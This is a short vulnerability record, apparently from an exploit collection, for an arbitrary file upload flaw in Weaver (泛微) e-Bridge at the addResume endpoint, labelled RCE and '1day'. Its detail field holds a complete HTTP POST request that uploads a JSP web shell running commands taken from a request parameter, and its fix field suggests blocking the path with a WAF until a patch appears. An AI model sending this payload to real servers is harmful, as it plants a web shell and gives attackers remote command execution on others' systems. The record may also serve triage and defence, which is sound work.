vendor = "泛微"
name = "泛微云桥 e-Bridge addResume任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/wxclient/app/recruit/resume/addResume"
detail = "POST /wxclient/app/recruit/resume/addResume?fileElementld=111 HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7 ------WebKitFormBoundaryDOVhr5SwLI1wpry7 Content-Disposition: form-data; name=\"file\";filename=\"1.jsp\" <%Runtime.getRuntime().exec(request.getParameter(\"i\"));%> ------WebKitFormBoundaryDOVhr5SwLI1wpry7-- Content-Disposition: form-data; name=\"file\";filename=\"2.jsp\" 1 ------WebKitFormBoundaryDOVhr5SwLI1wpry7--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
